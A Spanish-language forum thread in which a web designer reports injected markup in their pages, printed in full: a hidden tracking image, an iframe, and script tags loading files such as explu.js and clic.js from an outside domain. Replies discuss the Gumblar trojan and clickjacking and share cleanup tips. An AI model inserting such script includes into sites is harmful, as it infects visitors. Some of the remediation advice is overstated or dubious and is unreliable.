Script no deseado

No se si preguntar esto aca pero lo voy a hacer, estoy diceñando un web y me figuran script o algo que nose que es y que hace que se genere otro DOCTYPE html dentro del mismo pero no logro verlo haciendo "ctrl+u" y solo lo veo cuando en el explorador pongo "inspeccionar elemento"... y veo esto:


<img src="http://whos.amung.us/swidget/adcomdrag.png" style="display: none;"></img>
<iframe id="ifrm" src="http://tomaperrys.blogspot.com/">
<link type="image/x-icon" rel="icon" href="http://tomaperrys.blogspot.com.ar/favicon.ico"></link><link rel="canonical" href="http://tomaperrys.blogspot.com/"></link><link href="http://tomaperrys.blogspot.com/feeds/posts/default" title="tomaperry - Atom" type="application/atom+xml" rel="alternate"></link><link href="http://tomaperrys.blogspot.com/feeds/posts/default?alt=rss" title="tomaperry - RSS" type="application/rss+xml" rel="alternate"></link><link href="http://www.blogger.com/feeds/7275322898226082902/posts/default" title="tomaperry - Atom" type="application/atom+xml" rel="service.post"></link><link href="http://www.blogger.com/rsd.g?blogID=7275322898226082902" title="RSD" type="application/rsd+xml" rel="EditURI"></link><link href="http://www.blogger.com/openid-server.g" rel="openid.server"></link><link href="http://tomaperrys.blogspot.com/" rel="openid.delegate"></link>
<script type="text/javascript" src="http://chascarrillo.net/apps/op.js"></script><script type="text/javascript" src="http://chascarrillo.net/apps/otros.js"></script><script type="text/javascript" src="http://chascarrillo.net/apps/explu.js"></script><script type="text/javascript" src="http://chascarrillo.net/apps/clic.js"></script>


No se que esta pasando por ende cerre los sitios que estaba haciendo hasta que esto no aparezca mas... bueno espero me ayuden o me digan que es?


Gracias y saludos...

Hola,

Supongo que habrás visto los !DOCTYPE de los iframe que tienes puesto...date cuenta que los iframe es incorporar otra página web en una parte de la tuya y genera el código completo de la otra página así que debe ser eso.

Saludos

Gracias por responder, pero yo estoy creando esos iframe... eso es lo que me llama la antencion... tampoco tengo ningun meta content ni nada. Solo la oja de estilo y el titulo del sitio, algo basico.

Es mas, tenia una cuenta de blogspot y la elimine, por las dudas...

Hola! Tengo el mismo problema, ya escaneé con antimalware primero luego antivirus y sigue ahí.

el add block como bien dice zreep, arroja la información: http://tomaperrys.blogspot.com/
y al entrar en esa dirección sucede lo mismo que se ve en la esquina inferior izquierda, un cuadro chico en blanco con barras laterales, en ocasiones se abren más de una en el mismo cuadro encimándose. Todavía no doy con la solución, si la encuentro se las vengo a comentar.
Si alguien sabe qué es y cómo quitarlo se lo agradecería. Buen día!

Bueno, buscando por la web encontre esto: http://productforums.google.com/foru...es/dcgM7PEhplU

Personas con el mismo problema y una de las respuesta que me llamo la atención fue esta:

------

Actualmente creemos que se trata de un troyano llamado Gumblar: http://news.cnet.com/8301-1009_3-10244529-83.html que usa el clickjaking: http://news.cnet.com/8301-1009_3-10247327-83.html

Después de eliminar los iframes de los archivos infectados (más de 50.000). buscar el código malicioso nuevamente con el comando: find /var/www/vhosts/*/httpdocs -name *.html | xargs grep -l cn:8080 (que busca dentro de todos los archivos el item cn:8080 ) y nos dimos cuenta que habían archivos eran infectados nuevamente. Entonces, eliminamos nuevamente los archivos usando un script en php que desarrollamos y luego cerramos el puerto 21 que es del ftp.De esta forma dejaron de infectarse los archivos. Aun no hemos encontrado una solución definitiva pero por lo pronto tendremos bloqueado el puerto del ftp.

Si alguien requiere del script que busca y elimina el iframe de los archivos infectados, puede solicitarmelo.

Espero que esta información sea útil.

Saludos desde Colombia.

------

-----

People using Windows and IE should disable JavaScript to help protect against clickjacking, he said. Firefox is safer; the NoScript add-on for Firefox not only lets people selectively block scripts, but it has a ClearClick feature designed specifically to protect against clickjacking, he added.


fuente: http://news.cnet.com/8301-1009_3-10247327-83.html
-----

Como no me quedo con una respuesta baje el complemento para Firefox y funciona...

No se si es o no es... no voy a dar por concluido esto que hace que mis datos esten en peligro. Tampoco se como funciona este supuesto troyano, pero tendriamos que informar esto y los moderadores de este foro investigar y dar apoyo a temas como este que son importantes... Me doy cuenta que en este tema fallamos todos, no hay informacion, hay mas preguntas que respuestas y la gente que sabe no aporta la informacion adecuada, que en los FAQ's de este foro (HTML) no hay nada al respecto de este tema.

En mi caso, no soy ducho en el tema de seguridad, pero me pasa algo que me preocupa y no puedo dejar de compartir los que encontre. Si hay algo que sepan compartanlo.

Esto nos puede pasar a todos... Saludos

Zreep

Aporto algo mas y espero que si algo mal nos informen:

-----


Actualmente la única forma eficaz de protegerse de los iframes es eliminarlos si estás infectado, a mano, uno por uno los archivos "index","defalut","home" y cualquier otro y luego cambiarles los permisos a 444, con esto no podrán entrar más en tus archivos.

Es una opción que funciona al 100% y que no se por qué aquí no se ha propuesto.

No tenemos formas de eliminar las entradas IFRAME en un archivo con permisos de escritura (CHMOD 6xx) ya que los piratas aprovechan una vulnerabilidad del servidor PHP con el método GETSERVERVARS y pueden insertar el código a sus anchas. Si impedimos desde nuestro server que el archivo sea escribible (CHMOD 4XX) el script del pirata no podrá agregar el código malicioso y no sufriremos ataques.

Saludos.


-----

Gracias zreep

Hola zreep:

La consulta estaría mejor situada en la sección de JavaScript, ya que tienes una duda relacionada con los scripts.

Sobre el uso de iframes, es muy obsoleto y ya no cumple los estandares de W3C.

Si usas los iframes para ver contenidos de otras páginas, es mejor que crees un enlace a esa página.

Saludos.